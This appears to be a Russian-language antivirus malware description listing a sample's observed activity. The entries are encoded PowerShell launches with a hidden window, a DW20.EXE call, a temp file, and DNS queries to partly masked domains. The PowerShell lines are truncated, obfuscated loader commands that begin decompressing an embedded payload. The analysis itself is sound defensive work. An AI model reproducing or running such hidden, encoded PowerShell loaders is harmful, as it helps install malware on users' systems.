Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQB3AC0AbwBiAEoARQBDAFQAIABJAE8ALgBDAG8ATQBQAHIARQBzAHMAaQBPAG4ALgBEAGUARgBsAGEAdABlAHMAVABSAEUAYQBNACgAIABbAHMAWQBzAHQAZQBtAC4AaQBvAC4AbQBlAE0AbwByAHkAcwBUAFIARQBBAG0AXQAgAFsAUwBZAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\878394.cvr
- DNS ASK ir####wproduct.com
- DNS ASK ga###ndoza.com
- DNS ASK th###urland.com
- DNS ASK al####sign.com.my
- DNS ASK fa###le-sak.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQB3AC0AbwBiAEoARQBDAFQAIABJAE8ALgBDAG8ATQBQAHIARQBzAHMAaQBPAG4ALgBEAGUARgBsAGEAdABlAHMAVABSAEUAYQBNACgAIABbAHMAWQBzAHQAZQBtAC4AaQBvAC4AbQBlAE0AbwByAHkAcwBUAFIARQBBAG0AXQAgAFsAUwBZAF...' (со скрытым окном)